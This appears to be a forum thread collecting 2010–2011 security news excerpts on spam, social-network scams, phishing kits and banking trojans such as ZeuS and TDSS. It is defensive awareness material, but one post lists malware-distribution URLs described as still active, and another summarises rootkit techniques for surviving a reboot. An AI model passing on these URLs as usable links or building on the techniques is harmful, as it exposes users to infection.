November 30, 2010 - "Our spamtraps started to get flooded with a new type of spam which is spreading a malicious file. The authors somehow couldn’t decide how to make the scam more credible, so they mixed up whatever they could find. The email pretends to be an electronic card coming from a “Europe Bank” but in the body the German bank “Bankpost” (which doesn’t exist, but should remind the recipient of Postbank obviously) is mentioned... The file referenced is called “card.exe” and contains the Trojan detected by our products TR/Drop.Agent.ctj.
With Christmas coming soon, we expect more and more of such scams pretending to be ecards from known persons, financial institutions and companies. Never click on the links contained, never execute the files attached in the email..."


2010-12-06, 19:19

Fake viral SPAM messages ...
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake System Performance Software E-mail Messages...
December 06, 2010
Fake Secure Banking Application E-mail Messages...
December 06, 2010
Rapidshare Link E-mail Messages...
Updated! December 06, 2010

- http://www.ironport.com/toc/
Virus Outbreak In Progress

- http://labs.m86security.com/2010/12/mcafee-secure-short-url-service-or-is-it/
December 6, 2010 - "... Users should carefully check the links coming from emails, Facebook or any other social network, when the sender is unknown and the link is shortened, because there is no guarantee the URL is safe ..."


2010-12-10, 19:33

SPAM msgs lead to "Virus Outbreak In Progress" ...

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake United Parcel Service Shipment Arrival E-mail Messages...
New! December 10, 2010
Fake DHL Shipment E-mail Messages...
Updated! December 10, 2010
Rapidshare Link E-mail Messages...
Updated! December 10, 2010
Fake Chat Invitation E-mail Messages...
Updated! December 10, 2010

- http://www.ironport.com/toc/
Virus Outbreak In Progress ...


2010-12-20, 14:38

TDSS malware/rootkit autostart...
- http://blog.trendmicro.com/dissecting-the-autostart-technique-of-tdss/
Dec. 20, 2010 - "... Samples of a new TDSS variant, WORM_TDSS.TX, use the infamous LNK vulnerability (first brought to public attention by Stuxnet) to propagate... There are two techniques that TDSS uses for its autostart routines:
• Randomly choosing a system driver file (normally seen in %Windows%\System32\Drivers), modify its resource section, and use this to directly read hard disk sectors, and assemble its DLL file for its main malware behavior.
• Modifying the Master Boot Record (MBR) and use this to directly read hard disk sectors, and assemble its DLL file for its main malware behavior...
TDSS targets BootExecute applications that are started by the Session Manager (smss.exe) before invoking the initial command (Winlogon in Windows XP) and before various subsystems were started. User-mode applications are not yet running at this point. Because they run so early, there is significant restriction on BootExecute applications: they must be native applications. In this context, “native” means that only the Windows NT Native API, resident in ntdll.dll, is available. At this stage, the Win32 subsystem, composed of the kernel-mode win32k.sys component and the user-mode client/server runtime CSRSS have not yet been started by SMSS. Not even the Kernel32 library is usable by BootExecute applications..."
(More detail and flowchart available at the URL above.)

TDSS infection count (alias: TDL3, Alureon)
- http://blog.trendmicro.com/wp-content/uploads/2010/11/2010-11-10-blog-tdss-infection-count.jpg

- http://support.kaspersky.com/viruses/solutions?print=true&qid=208280684
2010 Dec 17

- http://blog.urlvoid.com/new-tdss-variants-install-plenty-of-software/
December 19, 2010


2010-12-27, 13:48

ZeuS variant returns ...
- http://blog.trendmicro.com/old-zeus-variant-returns-for-christmas/
Dec 23, 2010 - "... A spammed message, purportedly from the Executive Office of the President of the United States, spreads holiday cheer with a message and links to what is supposedly a greeting card. Clicking the link, however, leads users to a website injected with malicious iFrame tags, which Trend Micro detects as HTML_IFRAME.SMAX. Viewing the malicious HTML page leads to the download of a .ZIP file, which contains the malware detected as TSPY_ZBOT.XMAS... This particular variant exhibits routines that ZeuS version 1.x are known for. Apart from the typical information theft routines, it modifies HOSTS files to prevent affected victims from accessing AV-related websites. The technique of using important events to lure potential victims to open the spam mail is not new either. While some targeted victims may have an idea that the these types of messages could be malicious, some people simply rely on their antivirus programs. The cybercriminals behind this attack took advantage of this fact by ensuring that the file is heavily packed and is not yet detected by most AV programs, leaving unknowing users vulnerable..."

- http://isc.sans.edu/diary.html?storyid=10138
Last Updated: 2010-12-23 23:00:10 UTC - "... reports of some targeted emails from 'The White House'..."


2010-12-30, 19:42

Beware of strange web sites bearing gifts ...
- http://isc.sans.edu/diary.html?storyid=10168
Last Updated: 2010-12-29 22:02:52 UTC - "... a recent wave of Java exploits to several addresses in the same netblock**. The latest exploits in this case start with a file called "new.htm", which contains obfuscated code... The good news is that "host.exe" already has pretty decent anti-virus coverage on VirusTotal*... all the user has to do is click "Run" to get owned. The one small improvement is that the latest JREs show "Publisher: (NOT VERIFIED) Java Sun" in the pop-up, but I guess that users who read past the two exclamation marks will be bound to click "Run" anyway ..."
- http://isc.sans.edu/diaryimages/d-img3%281%29.jpg

* http://www.virustotal.com/file-scan/report.html?id=f3e5bed2a9d835010ed392dce20b6ea570b62e66e69291dd8104c7e65b3ef9d8-1293650723
File name: host.exe
Submission date: 2010-12-29 19:25:23 (UTC)
Result: 31/43 (72.1%)

** http://isc.sans.edu/diary.html?storyid=10165
Last Updated: 2010-12-29 00:04:58 UTC


2010-12-30, 20:05

Android trojan found in wild - NEW
- http://blog.mylookout.com/2010/12/geinimi_trojan/
December 29, 2010 - "A new Trojan affecting Android devices has recently emerged in China. Dubbed “Geinimi” based on its first known incarnation, this Trojan can compromise a significant amount of personal data on a user’s phone and send it to remote servers... Geinimi is also the first Android malware in the wild that displays botnet-like capabilities. Once the malware is installed on a user’s phone, it has the potential to receive commands from a remote server that allow the owner of that server to control the phone..."

- http://www.h-online.com/security/news/item/Android-trojan-collects-personal-data-1162008.html
30 December 2010 - "... If you get your apps from obscure sources, you will want to be careful not to give them unlimited rights, which the apps request upon installation; instead contact the vendor to see what rights are actually needed."

- http://isc.sans.edu/diary.html?storyid=10186
Last Updated: 2010-12-31 09:47:01 UTC


2011-01-01, 18:13

New Year SPAM - Storm/Waledac...
- http://community.websense.com/blogs/securitylabs/archive/2010/12/31/yesterday-s-new-year-email-theme-post-is-storm-waledac.aspx
31 Dec 2010 09:50 PM - "... emails mentioned were an early campaign done by what's now believed to be Storm v3 or Waledac v2. As our friends over at ShadowServer mention**... The URL in the email leads to lots of different sites, all compromised, where the user is immediately redirected using a <meta refresh> tag... A few other noteworthy things about this attack:
• The domains it uses to serve the malware are fast-fluxing which means that when you request the URL it redirects to you a different IP address every time
• The file itself is either server-side generated or just updated very frequently
• AV coverage is pretty bad* ..."
* http://www.virustotal.com/file-scan/report.html?id=54a643acad42df4eb5380765b25abce2a7157b62188458757cc984757343b57e-1293849911
File name: flash-006.exe
Submission date: 2011-01-01 02:45:11 (UTC)
Result: 7/42 (16.7%)

** http://forums.spybot.info/showpost.php?p=392223&postcount=52


2011-01-04, 17:45

Xvid video fakes... TRON previews...
- http://sunbeltblog.blogspot.com/2011/01/tron-and-gone-fakeouts-galore.html
January 04, 2011 - "... hunting for some TRON action on the internet may end in frustration, surveys and installs aplenty. For example, hd-movies(dot)biz gives us a fairly standard “Fake advert on Youtube/hit you with a survey” scam... You might not want to bother... Clicking the player underneath the banner splash takes you to browserdl(dot)com/xvid_dl/ which wants you to install a program... XvidSetup.exe... there isn’t any TRON action going down once the end-user has installed ClickPotato, ShopperReports, QuestBrowser and blinkx Beat..."


2011-01-07, 14:50

NeoSploit exploit kit - dynamic obfuscation...
- http://labs.m86security.com/2011/01/shedding-light-on-the-neosploit-exploit-kit/
January 4, 2011 - "... dynamic obfuscation still makes it much harder for security vendors to block this type of attack... Not only has the Neosploit team upgraded their obfuscation techniques, they’ve also put a lot of thought into the architecture of the toolkits backend. Unlike other exploit kits, where the authors sell the toolkit itself (in some cases the source code is encrypted and could work only under a certain domain), the users of the Neosploit Exploit Kit don’t need to have the source code or even the compiled version of the tool. The Neosploit backend is activated only by the team itself and the users just receive access to use it, effectively establishing a business model of Malware-as-a-Service... it is being maintained and adjusted to keep up with security trends to allow it to stay ahead of the curve."
(More detail available at the m86 URL above.)

How hacks profit...
- http://blog.trendmicro.com/wp-content/uploads/2011/01/2011-01-06-blog-vulnerability-img1a.jpg


2011-01-07, 18:40

Facebook scam - again...
- http://nakedsecurity.sophos.com/2011/01/06/my-1st-sttus-scam-hits-facebook-users-hard-spreads-virally/
January 6, 2011 - "Thousands upon thousands of Facebook users have been hit by a new survey scam spreading virally across the social network. Messages claiming to be users' first ever Facebook status updates are being posted on users' walls by a rogue application... Here's what some typical messages look like:
My 1st St@tus was: "[random message]". This was posted on [random date]
Find your 1st St@tus @ [LINK]
Other versions read:
My 1st status was: '[random message]' Posted on [random date]
Find out what your 1st status is at [LINK]
If you click on the link you are taken to a rogue Facebook application, which asks you to give it permission to access your profile, which includes giving it the ability to post from your account in your name... it's only intention is to drive as many people as possible into sharing the link (which can vary - we have seen several examples) further and further across Facebook, earning the scammers money..."


2011-01-10, 13:20

Facebook weekend worm...
- http://www.theregister.co.uk/2011/01/10/facebook_worm_photo_chat_scam/
10 January 2011 - "A new worm that spreads using a photo album chat message lure began proliferating across Facebook over the weekend. The photo lure is used to hoodwink potential users into downloading a malicious file, which appears in the guise of a photo viewing application. Victims are prompted to click a "View Photo" button... users who fell for the scam became infected by malware, dubbed Palevo-BB* by net security firm Sophos. The malware attempts to generate a message to the victim's Facebook contacts, continuing the infection cycle. Facebook responded by purging the malicious application.
Similar social engineering trickery is much more commonly used to hoodwink users into completing worthless surveys, possibly handing over personal details in the process or signing up to expensive text message services. Survey scams have become almost a daily pest on Facebook. For example, one survey scam** lure doing the rounds over the weekend falsely offered a news update of the death of famous rapper Tupac Shakur. The use of social engineering trickery to spread malware instead of simply tricking users into filling out worthless surveys suggests that cybercrooks might be upping the ante. The latest Palevo-BB worm is not the first malware strain to use Facebook as an infection avenue. The most prolific social engineering network worm to date has been the infamous Koobface worm, a strain of malware used to deliver potential victims to scareware scam portals or carry out click fraud..."
* http://nakedsecurity.sophos.com/2011/01/09/facebook-photo-album-chat-messages-spreading-koobface-worm/

** http://nakedsecurity.sophos.com/2011/01/08/125000-people-fooled-by-tupac-shakur-suge-knight-facebook-scam

- http://labs.m86security.com/2011/01/facebook-1st-status-scam-spreads-rapidly/
January 11, 2011


2011-01-12, 09:46

SPAM cannons on holiday
- http://isc.sans.edu/diary.html?storyid=10255
Last Updated: 2011-01-12 04:06:34 UTC - "... There was a clear reprieve in spam delivered over the 2010 year end holiday season for various reasons. SpamCop.net* shows a decisive break in spam delivery that resumed action late Sunday... we wanted to share with you some corresponding DShield data... shows unwanted connections, which should be a good sample representation of infected systems. There is a slight dip which can be attributed to the holiday season or a "weekend drop" type of decline. It does not indicate spam cannons have been replaced by more lucrative malicious channels, nor have the botnets taken a break either..."

* http://www.spamcop.net/spamgraph.shtml?spamweek

- http://www.spamcop.net/spamgraph.shtml?spammonth

- http://krebsonsecurity.com/2011/01/taking-stock-of-rustock/
January 5, 2011

- http://www.symantec.com/connect/blogs/rustock-hiatus-ends-huge-surge-pharma-spam
10 Jan 2011


2011-01-12, 18:37

Q4-2010 - Top 50 Bad Hosts and Networks
- http://hostexploit.com/blog/14-reports/3528-repeat-offenders-host-cybercrime-activity.html
12 January 2011 - "... The emphasis this quarter is on the repeat offending of some hosting providers... VolgaHost AS29106 is no stranger to the Top 50 reports, having been in the top 10 for the entire 6 months prior to this quarter. And yet the effective badness levels have continued to rise to now take the #1 rank. Particularly prevalent on VolgaHost are Zeus servers and infected web sites. On the theme of repeat offenders, it has been a disappointing quarter for eNom AS21740, the domain Registrar arm of Demand Media. Ever willing to give credit where due, HE praised, in the last quarter report, what seemed to be a genuine attempt on eNom’s part to ‘clean-up’. Sadly, however, this effort appears to have been short lived. eNom is back up to ranking #3 from #7 in Q3, having previously been #1. In the Badware sector eNom is once again top of the pile as #1 Bad Host. HE’s view is that the majority of hosts do a good job at keeping their servers clean. So why then are there hosts such as VolgaHost, eNom and Ecatel AS29073 (displaced from #1 down to #2), all of whom display enduring levels of cybercriminal activities on their servers?... Perhaps the attitude of hosting providers is best summed up by Andre' M. Di Mino (Co-Founder & Director of The Shadowserver Foundation) in his foreword to the report:
"The majority of network and hosting providers are very concerned about their reputation and will respond in rapid fashion when notified of malicious activity. Others are content to let such activities flourish. In any case, it is important to highlight those providers where malicious activity is rampant, and raise general public awareness." - Andre' M. Di Mino
HE’s Q4 2010 Report exposes the persistent nature of some of the more dubious activities hosted by a few providers such as:
• INTERIAPL (PL) AS16138 #1 for Current Events (exploit kits etc) since June 2010.
• DATA ELECTRONICS (IE) AS13100 #1 for Exploit Servers in the last 2 reports.
An example of the lack of due diligence allowing bad habits to return can be seen with Brazilian Cyberweb Networks AS28299. This hosting provider had dropped down to #228 in Q3 2010, from #9 in Q2 as a result of ‘cleaning-up’. Recent increased levels of botnets and phishing, however, has bounced this provider back up to #21. The HE Q4 2010 Report recognizes the genuinely hard effort made by hosts and providers intent on ‘cleaning up’. The ‘Most Improved Hosts’ section displays those deserving of praise and approval for their achievements. For example: CTC-CORE-AS (RU) AS44237 #29 in Q3 now #27,204. An improvement of 99% to almost negligible levels of badness. The vast majority of hosts do provide a safe and relatively clean Internet experience for their customers. Approximately only 6% of the 36,371 public ASes (Autonomous Systems) display levels of badness that give cause for concern through ineffective abuse procedures and a tolerance of cybercriminal friendly activities. The HE quarterly reports continue to display the results of the monitoring ‘bad’ hosts in anticipation of a cleaner and safer Internet experience for all users..."


2011-01-14, 23:48

Death by PowerPoint...
- http://nakedsecurity.sophos.com/2011/01/12/death-by-powerpoint-kamasutra-presentation-leads-to-backdoor-infection/
January 12, 2011 - "... The malware comes as a file called Real kamasutra.pps.exe (the old double-extension trick). In other words, you may think you are directly opening a PowerPoint slideshow, but in fact you're running an executable program. The PowerPoint slide deck... is then dropped onto your Windows PC as a decoy while malware silently installs onto your computer as AdobeUpdater.exe, alongside some other components (called jqa.exe and acrobat.exe). Because of this, when you click on the file you do get to see a real PowerPoint presentation, but in the background a backdoor Trojan (no sniggering at the back please..) called Troj/Bckdr-RFM is installed which allows hackers to gain remote access to your computer. Once they have broken into your computer, they can use it to relay spam around the world, steal your identity, spy on your activities, install revenue-generating adware or launch denial of service attacks. Remember - don't rush to click on unknown files, you could be opening yourself up to all kinds of unwanted attention."

I've won three million Euros from Bill Gates!
- http://nakedsecurity.sophos.com/2011/01/13/ive-won-three-million-euros-from-bill-gates/
January 13, 2011 - "... I had no idea that the Bill and Melinda Gates Foundation, which normally fights poverty around the world and promotes healthcare, even ran a lottery - let alone that I had entered... Counting isn't this emailer's strong point either. He's managed to attach a grand total of 69 files to this email telling me about my windfall. Eventually I found the right one, entitled LOTTERY BILL GATES FOUNDATION.docx..." [NOT]


2011-01-15, 13:50

New Koobface Campaign Spreading on Facebook
- http://community.websense.com/blogs/securitylabs/archive/2011/01/14/new-koobface-campaign-spreading-on-facebook.aspx
14 Jan 2011 - "Websense... has detected a new Koobface campaign spreading on Facebook. The campaign is spreading via direct messages sent from compromised accounts... One of the tactics employed by the Koobface gang is to attempt to obfuscate the malicious URL that is linked in each message... this is done by adding "hpPg" just before the valid URL link--an obvious attempt to avoid detection by security software and by the Facebook security team. The addition at the start of the URL makes it unclickable, but this is unlikely to stop determined users from copying and pasting the link directly into the browser. Another tactic is the use of open redirects on the facebook.com domain itself. This gives the URL a more credible look (social engineering), as well as helping it pass basic security checks. Usually, Facebook alerts users if they're about to browse to a link outside of its domains, but no alert is triggered in this case... the open redirect on facebook.com points to a bit.ly shortened link. The redirector at bit.ly points to a compromised Web site controlled by Koobface. The compromised site checks whether the request was referred from facebook.com. If it was, then it serves a dynamically generated script that further redirects to a malicious site. The malicious site requires "a missing Flash plug-in" in order to play a "video," a.k.a., a variant of the Koobface worm. At the time of writing, the variant had a 23% detection rate*..."
* http://www.virustotal.com/file-scan/report.html?id=33b11888e8733938bb9d55a79b87a54ade942f6ef6efd3775497923e2cf80ffe-1294946291
File name: setup6440.exe
Submission date: 2011-01-13 19:18:11 (UTC)
Current status: finished
Result: 10/42 (23.8%)
There is a more up-to-date report ...
- http://www.virustotal.com/file-scan/report.html?id=33b11888e8733938bb9d55a79b87a54ade942f6ef6efd3775497923e2cf80ffe-1295019657
File name: setup606699.exe
Submission date: 2011-01-14 15:40:57 (UTC)
Result: 16/43 (37.2%)


2011-01-17, 22:55

Rogue Facebook apps can now access your home address and mobile phone number
- http://nakedsecurity.sophos.com/2011/01/16/rogue-facebook-apps-access-your-home-address-mobile-phone-number/
January 16, 2011 - "... third party application developers are now able to access your home address and mobile phone number. Facebook has announced that developers of Facebook apps can now gather the personal contact information from their users... Facebook is already plagued by rogue applications that post spam links to users' walls, and point users to survey scams that earn them commission - and even sometimes trick users into handing over their cellphone numbers to sign them up for a premium rate service. Now, shady app developers will find it easier than ever before to gather even more personal information from users... The ability to access users' home addresses will also open up more opportunities for identity theft, combined with the other data that can already be extracted from Facebook users' profiles... advice to you is simple: Remove your home address and mobile phone number from your Facebook profile now. While you're at it, go through our step-by-step guide for how to make your Facebook profile more private*..."
* http://www.sophos.com/security/best-practice/facebook/account-settings.html

Zodiac sign survey SCAM...
- http://nakedsecurity.sophos.com/2011/01/16/zodiac-sign-survey-scam-spreading-virally-on-facebook/
January 16, 2011 - "A scam has spread far and wide across Facebook this weekend, posted on many users' Facebook pages claiming that they have discovered that their zodiac sign has changed. Messages include:
The Zodiac Signs changed in 2011.
I was a [ZODIAC SIGN] now I'm a [ZODIAC SIGN]
Find out your new zodiac sign @ [LINK]
... and
OMG They changed the Zodiac Signs !!
I'm now a [ZODIAC SIGN].. (was a [ZODIAC SIGN] before!)
To find yours, use [LINK]
If you make the mistake of clicking on the link shared from your friend's Facebook account, then you are taken to an interim page showing the signs of the zodiac floating in outer space... If you do give it permission then the application will be able to grab some of your personal data, as well as post messages to your wall in order to share them virally with your Facebook friends..."

- http://sunbeltblog.blogspot.com/2011/01/latest-fb-scam-see-your-total-profile.html
January 17, 2011


2011-01-18, 22:36

Facebook suspends personal data-sharing feature
- http://www.theregister.co.uk/2011/01/18/facebook_suspends_data_sharing_feature/
18 January 2011 - "Facebook has "temporarily disabled" a controversial feature that allowed developers to access the home address and mobile numbers of users. The social network suspended the feature, introduced on Friday, after only three days. The decision follows feedback from users that the sharing of data process wasn't clearly explained and criticism from security firms that the feature was ripe for abuse... Facebook seems to be rediscovering the lessons Microsoft learned when its introduced User Access Control permissions to allow apps to run in Vista... Facebook clearly shares at least some of these concerns or it wouldn't have decided to suspend the feature."


2011-01-19, 19:59

Fake Facebook mail = Bredolab malware SPAM...
- http://techblog.avira.com/2011/01/19/bredolab-malware-spammed-via-fake-facebook-mails/en/
January 19, 2011 - "Facebook is abused again to spread Malware via Email. The spam mails arrive with the subject “Facebook password has been changed. ID” and contain a ZIP archive as attachment... Inside the ZIP a file with the name “Facebook_Document.exe” is located which is trying to look harmless by using the icon of a Microsoft Word document... The victim will think that the document is the only thing which is opened, and that it shows the new Facebook password. But in the background a fake antivirus called “Microsoft Security Essentials” is downloaded and gets installed on the computer..."
(Screenshots available at the URL above.)


2011-01-21, 00:02

Twitter worm - out there...
- http://isc.sans.edu/diary.html?storyid=10297
Last Updated: 2011-01-20 16:41:39 UTC - "... new twitter worm out there. There are an increased number of messages... Those short URL points to the servers providing the malware. The following are some of the malicious URL I could gather (CAREFUL: THEY ARE STILL ACTIVE):
• http ://cainnoventa .it/m28sx.html
• http ://servizialcittadino .it/m28sx.html
• http ://aimos.fr/m28sx .html
• http ://lowcostcoiffure .fr/m28sx.html
• http ://s15248477.onlinehome-server .info/m28sx.html
• http ://www.waseetstore .com/m28sx.html
• http ://www.gemini .ee/m28sx.html
After clicking to the URL, you are sent to a faveAV web page..."
(Screenshots available at the ISC URL above.)

- http://www.pcworld.com/article/217308/twitter_targeted_with_fake_antivirus_software_scam.html
Jan 21, 2011 "... Del Harvey, head of Twitter's Trust and Safety Team, wrote on her Twitter account that 'we're working to remove the malware links and reset passwords on compromised accounts.' 'Did you follow a goo.gl link that led to a page telling you to install 'Security Shield' Rogue AV?' she wrote. 'That's malware. Don't install'..."

- http://nakedsecurity.sophos.com/2011/01/20/fake-anti-virus-attack-twitter-via-goo-gl-links/
January 20, 2011 - "... If you make the mistake of clicking on one of the malicious goo.gl links you are ultimately taken to a website which attempts to scare you into believing that you have a virus problem on your computer. You are then frightened into installing malicious code on your PC, and asked to pay money to disinfect your systems... Ukranian URL hosting the malware... The natural suspicion would be that their usernames and passwords have been stolen. It certainly would be a sensible precaution for users who have found their Twitter accounts unexpectedly posting goo.gl links to change their passwords immediately..."


2011-01-21, 19:08

Fraud advisory - FBI/iC3: e-mails...
- http://www.ic3.gov/media/2011/110119.aspx
January 19, 2011 - "... cyber criminals engaging in ACH/wire transfer fraud have targeted businesses by responding via e-mail to employment opportunities posted online. Recently, more than $150,000 was stolen from a US business via unauthorized wire transfer as a result of an e-mail the business received that contained malware. The malware was embedded in an e-mail response to a job posting the business placed on an employment website and allowed the attacker to obtain the online banking credentials of the person who was authorized to conduct financial transactions within the company. The malicious actor changed the account settings to allow the sending of wire transfers, one to the Ukraine and two to domestic accounts. The malware was identified as a Bredolab variant, svrwsc.exe. This malware was connected to the ZeuS/Zbot Trojan, which is commonly used by cyber criminals to defraud US businesses. The FBI recommends that potential employers remain vigilant in opening the e-mails of perspective employees. Running a virus scan prior to opening any e-mail attachments may provide an added layer of security against this type of attack. The FBI also recommends that businesses use separate computer systems to conduct financial transactions..."

Zbot-Zeus variants attack online money transactions...
- http://www.theregister.co.uk/2011/01/21/zeus_payment_provider_diversification/
21 January 2011 - "... Trusteer has detected 26 different ZeuS configurations targeting online payment provider Money Bookers. Configuration files are a set of instructions on what sites to target for the theft of login credentials, manipulation of HTML pages as presented to users of infected machines and other details. Another 13 variants of ZeuS, the last released only on 16 January, attempt to steal login credentials of Web Money users. Nochex, another online payment provider that specialises in providing payment processing services to small businesses, is the target of 12 different ZeuS configurations. Prepaid card provider netSpend and e-gold, a service abused as a payment clearing house by cybercrooks in the past, are also under attack by ZeuS wielding miscreants... More details... here*."
* http://www.trusteer.com/blog/zeus-latest-evolution-malware-trends-targets-online-payment-providers
January 20, 2011


2011-01-25, 16:43

SpyEye/ZeuS toolkit code shows up ...
- http://www.theregister.co.uk/2011/01/25/spyeye_zeus_merger/
25 January 2011 - "... first sample of code from the merger of the ZeuS and SpyEye cybercrime Trojan toolkits*... ZeuS has long been the root cause of many instances of banking fraud, while SpyEye is a much newer and even more aggressive addition... The malware-building tool includes options to build-in web injects, screenshot captures as well as hooks for various optional add-ins. Core functionality also includes code designed to evade Trusteer Rapport transactions security software, a security application offered to customers of many banks as a defence against banking Trojans. The latter feature shows that, once again, cybercrooks are attempting to up their game in response to developments by security defenders. Plug-ins include the ability to present users of compromised machines with fake pages and improved attacks against Firefox users... The cybercrime toolkit also includes improved credit-card grabbing functionality... Misdirection and misinformation... among the main tools of the cybercrime trade."
* http://blog.trendmicro.com/spyeyezeus-toolkit-v1-3-05-beta/
Toolkit detail ...


2011-01-26, 13:30

- http://community.websense.com/blogs/securitylabs/archive/2011/01/25/rebirth-of-a-phish-kit.aspx
25 Jan 2011 - "... The attack first imitates the Australian Tax Office (ATO) e-tax refund page, an online system where taxpayers can lodge their annual tax refund requests. The kit readies 7 of the biggest banks of Australia, covering almost all accounts. This kit was hosted on compromised Web sites with deep directories specifically mimicking the ATO Web site. Each bank phishing Web site was then placed... Similar to earlier phishing toolkits, this attack utilizes PHP scripts to retrieve, parse, and send on the compromised account information. The kit was also held on several other compromised Web sites to enable the failover of the attack - given the limited lifecycle of phishing sites, more users fall victim to them in the first 24 hours of the attack. The readiness of this phishing toolkit -exceeds- Rock Phish..."


Facebook Tunisia keystroke logger...
- http://www.theregister.co.uk/2011/01/25/tunisia_facebook_password_slurping/
25 January 2011 - "Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole login credentials of users critical of the North African nation's authoritarian government... The rogue JavaScript, which was individually customized to steal passwords for each site, worked when users tried to login without availing themselves of the secure sockets layer protection designed to prevent man-in-the-middle attacks. It was found injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, around the same time that protestors began demanding the ouster of Zine el-Abidine Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago..."

Facebook photos lead to malware...
- http://sunbeltblog.blogspot.com/2011/01/phony-facebook-photos-lead-to-malware.html
January 25, 2011 - "This latest Facebook scam seems to have been rattling around for a few weeks now, directing you to malware from hacked websites hosting the rogue files. There also appear to be various Facebook application pages offering up the same dubious content. Typically, the scam involves sending messages to Facebook users from compromised accounts... Not a lot of sophistication there, but it doesn’t really take much to get people clicking. Downloading the file and running it will result in you sending your friends more "Foto" related spam and the whole process begins again. Some users report the messages appearing on their walls, while others have screenshots of messages popping up in their chat applications..."

Facebook scam: Free cellphone recharge
- http://sunbeltblog.blogspot.com/2011/01/facebook-scam-free-cellphone-recharge.html
January 24, 2011


2011-01-26, 18:58

Carberp malware sniffs out A/V to maximize attack impact
- http://www.computerworld.com/s/article/9206140/Carberp_malware_sniffs_out_antivirus_use_to_maximize_attack_impact
January 24, 2011 - "... The authors of the new information-stealing trojan "Carberp" have added a feature that detects which antivirus program is running on victimized PCs, said Aviv Raff, the chief technology officer at Seculert, an Israeli security startup. Raff said the criminals added security software detection to make sure they're spending their money wisely... The test services Raff mentioned are similar to legitimate scanning services such as VirusTotal, which lets users upload suspicious files for scanning by scores of for-a-fee and free antivirus programs. Suspect samples that evade detection are shared with the anti-malware community for use in creating new signatures. But other, less scrupulous services have popped up to serve criminals. These services, which security blogger Brian Krebs reported on as early as December 2009*, do not alert security companies when a new piece of malware is detected. That makes them ideal for hackers to check whether code will be detected before they release it. Raff said hackers pay to run their malware through these gray-market services to check the detection status of their code before they release it... Raff expects that Carberp will follow in the footsteps of the SpyEye and Siberia attack kits, and like them, incorporate links to a scanning service. Last week, Raff published an analysis of Carberp** that described new features other than the antivirus polling, including encryption of all communication with the hacker command-and-control server..."
* http://krebsonsecurity.com/2009/12/virus-scanners-for-virus-authors/

** http://blog.seculert.com/2011/01/new-trend-in-malware-evolution.html


2011-01-27, 22:27

Facebook - NEW security: Secure Browsing (https)
- http://techblog.avira.com/2011/01/27/facebook-improves-security/en/
"Facebook starts to roll out a new security feature: Secure Browsing (https). It will be available in the options of “Account Security”, below the “Account Settings” page.
This means that all data sent from and to Facebook will be transferred encrypted over the Internet if possible. Attacks to steal identities (for example in WiFi networks with Firesheep) will be rendered impossible this way...
Currently the feature seems to struggle with some problems though... some online games in Facebook don’t work properly together with activated Secure Browsing. This should be solved very soon... this is a step in the right direction and every Facebook user should activate that option as soon as it is available..."
(See screenshots available at the URL above.)

- http://news.cnet.com/8301-27080_3-20029670-245.html
January 26, 2011

- http://www.theregister.co.uk/2011/01/26/facebook_https/
26 January 2011 - "... The move comes a day after pranksters hacked into the Facebook page of CEO Mark Zuckerberg..."

- http://community.websense.com/blogs/securitylabs/archive/2011/01/26/mark-zuckerberg-facebook-page-showing-rogue-comments.aspx
26 Jan 2011


2011-01-31, 15:17

The Tax Spam Cometh
- http://www.pcworld.com/businesscenter/article/218047/the_tax_spam_cometh.html
Jan 28, 2011 - "It is that time of the year again: time to wait anxiously for W2s and 1099s to arrive, then feverishly compile figures and look for deductions to try and get back as much of your money from the IRS - or Her Majesty's Revenue and Customs (HMRC) - as possible. Do you know what that means? That means it is also time for attackers to capitalize on tax season with malware and phishing scams... Phishing e-mails are circulating, claiming that a miscalculation has been detected and that the recipient is owed a larger refund. Fred Touchette of Appriver* explains the new tax season threat. "The scammers see this as an opportunity to possibly catch some people slipping even though this most recent scam is targeting people who are already expecting a refund. To obtain the increased refund, recipients are directed to open the e-mail file attachment titled "Tax.Refund.New.Message.Alert .HTML." The resulting Web page appears to be the actual HMRC site, but is actually generated locally. The form requests sensitive information such as credit card details and mother's maiden name in order to process the refund..."
* http://blogs.appriver.com/blog/digital-degenerate/tax-deadlines-create-spikes-in-scam-trend-lines


2011-02-02, 13:27

Waledac... [has stolen] almost 500,000 email passwords ...
- http://www.theregister.co.uk/2011/02/02/waledac_account_compromise/
2 February 2011 - "Researchers* have taken a peek inside the recently refurbished Waledac botnet, and what they've found isn't pretty. Waledac, a successor to the once-formidable Storm botnet, has passwords for almost 500,000 Pop3 email accounts, allowing spam to be sent through SMTP servers, according to findings published on Tuesday by security firm Last Line*. By hijacking legitimate email servers, the Waledac gang is able to evade IP-based blacklisting techniques that many spam filters use to weed out junk messages. What's more, Waledac controllers are in possession of almost 124,000 FTP credentials. The passwords let them run programs that automatically infect the websites with scripts that -redirect- users to sites that install malware and promote fake pharmaceuticals. Last month, the researchers identified almost 9,500 webpages from 222 sites that carried poisoned links injected by Waledac. The discovery comes a month after a new malware-seeded spam run was spotted. This had all the hallmarks of the storm botnet... “The Waledac botnet remains just a shadow of its former self for now, but that's likely to change given the number of compromised accounts that the Waledac crew possesses,” the Last Line researchers wrote. In addition to a generous helping of compromised credentials, Waledac also comes with a new command and control system that disseminates a list of router nodes to infected machines."
* http://blog.tllod.com/2011/02/01/calm-before-the-storm/
February 1, 2011
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20101230

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=229200280
Feb. 2, 2011

Time for password changes...
- https://www.microsoft.com/protect/fraud/passwords/checker.aspx


2011-02-04, 22:35

Exploit rate - 61 percent of new vulnerabilities...
- http://www.darkreading.com/taxonomy/index/printarticle/id/229201156
Feb 03, 2011 - "The number of exploited vulnerabilities jumped dramatically last month, with more than 60 percent of new vulnerabilities being exploited... Exploit activity is typically at a rate of 30 to 40 percent, according to Fortinet's newly released January 2001 Threat Landscape report*. Close to half of "critical" vulnerabilities were exploited by attackers..."
* http://blog.fortinet.com/january-2011-many-new-vulnerabilities-exploited-spam-takes-another-hit/


2011-02-06, 13:07

Nasdaq hacked ...
- http://online.wsj.com/article/SB10001424052748704843304576126370179332758.html?mod=WSJ_hp_LEFTTopStories#printMode
